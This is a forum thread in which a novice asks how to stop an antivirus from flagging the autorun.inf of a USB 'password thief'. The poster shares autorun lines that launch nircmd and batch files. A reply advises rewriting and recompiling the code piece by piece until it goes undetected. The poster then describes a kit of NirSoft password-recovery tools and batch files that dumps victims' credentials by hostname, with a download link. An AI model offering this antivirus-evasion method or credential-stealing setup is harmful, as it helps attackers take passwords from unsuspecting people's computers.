How to make autorun.if undetect

Snip3r

hey..Sup guy's.....???

i have some problems with my autorun.inf

i coded a smal password thief...[like usb thief]....but my av detcted it....any suggestions??..

srry...im new in coding...it is a new project for me...

thnxz in advance...

grtz

FFS you mupet, where is your source code, where is the history of troubleshooting steps you have taken? And where the hell is the actual information on the problem... you know, the stuff we can look at and go "well here's your problem". If you want help, fine, but at least tell us what the problem is beyond "I tried to make something to do x and it didn't work"...

sorry guy's for my topic....ur right abt the info....

ok...

i have this problem....when i want to test my thief, my av detect it as INF/autorun virus

this is the autorunfile

[autorun]

action=Open Files On Folder

icon=icons\drive.ico

shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

is there a way to hide the autorun??...like with attrib??

sorry guy's for my topic....ur right abt the info....

ok...

i have this problem....when i want to test my thief, my av detect it as INF/autorun virus

this is the autorunfile

[autorun]

icon=icons\drive.ico

is there a way to hide the autorun??...like with attrib??

hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected...

it isn't the autorun.inf that is detected! it is the program your executing with it!

nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls

you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe

Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.

hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected...

it isn't the autorun.inf that is detected! it is the program your executing with it!

nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls

you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe

Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.

Thnxz m8...

i allready fixed it........

here u have it...u have to do the same...

Password Recovery Utilities

Network Monitoring Tools

Internet Related Utilities

Command-Line Utilities

Desktop Utilities

Freeware System Tools

http://www.nirsoft.net

Using the autorun.inf, nirsoft programs and 5 bat files! Everything'll dumped in the folder Dump, with a foldername from that hostname.

autorun.inf

[autorun] 
icon=icons\drive.ico

http://members.lycos.nl/pih/bl00dburn3r/nirsoft_auto.rar

enjoy